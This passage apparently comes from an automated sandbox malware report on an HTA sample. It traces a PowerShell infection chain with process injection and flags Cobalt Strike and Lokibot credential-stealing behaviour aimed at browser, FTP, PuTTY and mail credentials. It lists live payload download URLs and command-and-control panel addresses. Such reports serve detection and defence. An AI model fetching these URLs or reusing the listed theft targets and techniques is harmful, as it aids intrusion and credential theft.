                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword13_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword13_2_0040D069
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts1
                Exploitation for Client Execution
                111
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                2
                Obfuscated Files or Information
                2
                Credentials in Registry
                14
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts4
                PowerShell
                Logon Script (Windows)211
                Process Injection
                1
                Software Packing
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares11
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets21
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556630 Sample: bestgirlfriendwhowinthehear... Startdate: 15/11/2024 Architecture: WINDOWS Score: 100 53 ip.1017.filemail.com 2->53 55 1017.filemail.com 2->55 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 18 other signatures 2->77 11 mshta.exe 1 2->11         started        signatures3 process4 signatures5 101 Detected Cobalt Strike Beacon 11->101 103 Suspicious powershell command line found 11->103 105 PowerShell case anomaly found 11->105 14 powershell.exe 34 11->14         started        process6 dnsIp7 61 192.3.243.136, 49730, 49738, 80 AS-COLOCROSSINGUS United States 14->61 49 seemybestthingswhi...girlwhichgiveuh.vbS, Unicode 14->49 dropped 51 C:\Users\user\AppData\...\dnftngtc.cmdline, Unicode 14->51 dropped 63 Detected Cobalt Strike Beacon 14->63 65 Suspicious powershell command line found 14->65 67 Obfuscated command line found 14->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 14->69 19 wscript.exe 1 14->19         started        22 powershell.exe 21 14->22         started        24 csc.exe 3 14->24         started        27 conhost.exe 14->27         started        file8 signatures9 process10 file11 79 Detected Cobalt Strike Beacon 19->79 81 Suspicious powershell command line found 19->81 83 Wscript starts Powershell (via cmd or directly) 19->83 87 3 other signatures 19->87 29 powershell.exe 7 19->29         started        85 Loading BitLocker PowerShell Module 22->85 45 C:\Users\user\AppData\Local\...\dnftngtc.dll, PE32 24->45 dropped 32 cvtres.exe 1 24->32         started        signatures12 process13 signatures14 107 Detected Cobalt Strike Beacon 29->107 109 Suspicious powershell command line found 29->109 111 Obfuscated command line found 29->111 34 powershell.exe 15 16 29->34         started        38 conhost.exe 29->38         started        process15 dnsIp16 57 ip.1017.filemail.com 142.215.209.78, 443, 49731 HUMBER-COLLEGECA Canada 34->57 89 Writes to foreign memory regions 34->89 91 Injects a PE file into a foreign processes 34->91 40 aspnet_compiler.exe 165 34->40         started        signatures17 process18 dnsIp19 59 94.156.177.95, 49739, 49740, 49741 NET1-ASBG Bulgaria 40->59 47 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 40->47 dropped 93 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 40->93 95 Tries to steal Mail credentials (via file registry) 40->95 97 Tries to steal Mail credentials (via file / registry access) 40->97 99 2 other signatures 40->99 file20 signatures21

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta21%ReversingLabsScript-JS.Trojan.Acsogenixx
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT0%Avira URL Cloudsafe
                https://aka..ora0%Avira URL Cloudsafe
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFhN0%Avira URL Cloudsafe
                https://1017.filemail0%Avira URL Cloudsafe
                http://192.3.243.136/33/LOGLK.txt0%Avira URL Cloudsafe
                94.156.177.95/simple/five/fre.php100%Avira URL Cloudmalware
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF$0%Avira URL Cloudsafe
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF(s0%Avira URL Cloudsafe
                http://94.156.177.95/simple/five/fre.php100%Avira URL Cloudmalware
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF100%Avira URL Cloudmalware
                http://192.3.243.136/33/seemybes0%Avira URL Cloudsafe
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFn0%Avira URL Cloudsafe
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFsLMEM0%Avira URL Cloudsafe
                https://1017.filemail.com/api/file/geLR0%Avira URL Cloudsafe
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF20%Avira URL Cloudsafe
                http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFp0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ip.1017.filemail.com
                142.215.209.78
                truefalse
                  high
                  1017.filemail.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    94.156.177.95/simple/five/fre.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://kbfvzoboss.bid/alien/fre.phpfalse
                      high
                      http://alphastand.top/alien/fre.phpfalse
                        high
                        http://94.156.177.95/simple/five/fre.phptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                          high
                          http://alphastand.win/alien/fre.phpfalse
                            high
                            http://alphastand.trade/alien/fre.phpfalse
                              high
                              http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFtrue
                              • Avira URL Cloud: malware
                              unknown
                              http://192.3.243.136/33/LOGLK.txttrue
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://1017.filemailpowershell.exe, 00000007.00000002.2329487892.0000000000887000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTpowershell.exe, 00000009.00000002.1949160377.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1949062119.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1950549145.0000000002F40000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://go.micpowershell.exe, 00000007.00000002.2359283206.0000000006FE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://aka..orapowershell.exe, 00000003.00000002.1715998634.0000000007635000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://go.micropowershell.exe, 00000001.00000002.1822805726.0000000004F88000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF(spowershell.exe, 00000001.00000002.1833233000.000000000780F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/Iconpowershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://1017.filemail.compowershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFhNpowershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://go.microspowershell.exe, 00000003.00000002.1712155166.0000000005397000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF$powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.3.243.136/33/seemybespowershell.exe, 00000001.00000002.1822805726.000000000595C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://1017.filemail.com/api/file/geLRpowershell.exe, 00000007.00000002.2337193230.0000000004D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFnpowershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFsLMEMpowershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmtpowershell.exe, 00000009.00000002.1995186710.00000000072B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF2powershell.exe, 00000001.00000002.1821744750.00000000032A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFppowershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      142.215.209.78
                                                                      ip.1017.filemail.comCanada
                                                                      32156HUMBER-COLLEGECAfalse
                                                                      192.3.243.136
                                                                      unknownUnited States
                                                                      36352AS-COLOCROSSINGUStrue
                                                                      94.156.177.95
                                                                      unknownBulgaria
                                                                      43561NET1-ASBGtrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1556630
                                                                      Start date and time:2024-11-15 18:13:08 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 6m 44s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:15
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 33.3%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 80
                                                                      • Number of non-executed functions: 12
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .hta
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target mshta.exe, PID 6676 because there are no executed function
                                                                      • Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 4592 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6884 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
                                                                      TimeTypeDescription
                                                                      12:14:00API Interceptor121x Sleep call for process: powershell.exe modified
                                                                      12:14:30API Interceptor77x Sleep call for process: aspnet_compiler.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      142.215.209.78Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                        Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                          SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                    SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          192.3.243.136Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 192.3.243.136/32/SMPLLS.txt
                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 192.3.243.136/33/LOGLK.txt
                                                                                          94.156.177.95Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 94.156.177.95/simple/five/fre.php
                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 94.156.177.95/simple/five/fre.php
                                                                                          Scan docs.exeGet hashmaliciousLokibotBrowse
                                                                                          • 94.156.177.95/simple/five/fre.php
                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 94.156.177.95/simple/five/fre.php
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ip.1017.filemail.comPurchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 142.215.209.78
                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 142.215.209.78
                                                                                          SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                          • 142.215.209.78
                                                                                          Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                          • 142.215.209.78
